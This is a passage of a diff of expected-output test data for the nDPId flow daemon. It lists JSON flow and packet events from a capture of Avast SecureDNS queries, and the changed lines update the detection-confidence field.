+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482396199,"flow_last_seen":1625482396320,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482401089,"flow_last_seen":1625482401211,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482484544,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482399044,"flow_last_seen":1625482399165,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482316411,"flow_last_seen":1625482316532,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482486856,"flow_last_seen":1625482486976,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483010449,"flow_last_seen":1625483010449,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483010449,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1625483010449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625483010449,"pkt":"eJS0JASgYDjgxTWgCABFAABDf5MAAH8RH5\/AqAJktdYjlejdAbsALyrioMIBAAABAAAAAAAAATIJc0VDVXJFRG5zBWFWQXN0A2NvTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483010449,"flow_last_seen":1625483010449,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483010449,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483010449,"flow_last_seen":1625483010449,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483010449,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1625483010570,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625483010570,"pkt":"YDjgxTWgeJS0JASgCABFAADMH70AADMRyuy11iOVwKgCZAG76N0AuKNQoMKBgAABAAEAAAAAATIJc0VDVXJFRG5zBWFWQXN0A2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073336,"flow_last_seen":1625483073336,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073336,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1625483073336,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625483073336,"pkt":"eJS0JASgYDjgxTWgCABFAABDR0IAAH8RV\/DAqAJktdYjlf4nAbsAL7S54cABAAABAAAAAAAAATIJc0VDVXJFRG5zBWF2QXN0A0NvTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073336,"flow_last_seen":1625483073336,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073336,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073336,"flow_last_seen":1625483073336,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073336,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1625483073457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625483073457,"pkt":"YDjgxTWgeJS0JASgCABFAADMaN0AADIRgsy11iOVwKgCZAG7\/icAuC0o4cCBgAABAAEAAAAAATIJc0VDVXJFRG5zBWF2QXN0A0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1625483073457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625483073457,"pkt":"eJS0JASgYDjgxTWgCABFAABDRz4AAH8RV\/TAqAJktdYjlcrZAbsAL46OWvoBAAABAAAAAAAAATIJU0VjVXJlRG5zBWFWQXN0A2NPbQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1625483073457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625483073457,"pkt":"YDjgxTWgeJS0JASgCABFAADMZ5oAADIRhA+11iOVwKgCZAG7ytkAuAb9WvqBgAABAAEAAAAAATIJU0VjVXJlRG5zBWFWQXN0A2NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1625483073457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625483073457,"pkt":"eJS0JASgYDjgxTWgCABFAABDRzoAAH8RV\/jAqAJktdYjlczBAbsAL78\/SIEBAAABAAAAAAAAATIJc2VDVXJlZE5zBWFWQVNUA2NPTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1625483073457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625483073457,"pkt":"YDjgxTWgeJS0JASgCABFAADMX7kAADIRi\/C11iOVwKgCZAG7zMEAuDeuSIGBgAABAAEAAAAAATIJc2VDVXJlZE5zBWFWQVNUA2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":63,"packets-processed":62,"total-skipped-flows":0,"total-l4-payload-len":6665,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":31,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":31,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":162,"global_ts_msec":1625511643408} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511643408,"flow_last_seen":1625511643408,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1625511643408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625511643408,"pkt":"eJS0JASgYDjgxTWgCABFAABDhScAAH8RGgvAqAJktdYjlehSAbsAL7NiOO0BAAABAAAAAAAAATIJU2VDVVJFZG5zBUFWYVN0A2NPTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511643408,"flow_last_seen":1625511643408,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511643408,"flow_last_seen":1625511643408,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1625511643529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625511643529,"pkt":"YDjgxTWgeJS0JASgCABFAADM0vYAADMRF7O11iOVwKgCZAG76FIAuCvROO2BgAABAAEAAAAAATIJU2VDVVJFZG5zBUFWYVN0A2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511645426,"flow_last_seen":1625511645426,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625511645426,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1625511645426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625511645426,"pkt":"eJS0JASgYDjgxTWgCABFAABDhSsAAH8RGgfAqAJktdYjldJPAbsAL0czmx8BAAABAAAAAAAAATIJc2VDVVJFRE5TBWF2QVN0A2NvbQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511645426,"flow_last_seen":1625511645426,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625511645426,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511645426,"flow_last_seen":1625511645426,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625511645426,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1625511645546,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625511645546,"pkt":"YDjgxTWgeJS0JASgCABFAADM008AADMRF1q11iOVwKgCZAG70k8AuL+hmx+BgAABAAEAAAAAATIJc2VDVVJFRE5TBWF2QVN0A2NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483010449,"flow_last_seen":1625483010570,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482998213,"flow_last_seen":1625482998333,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
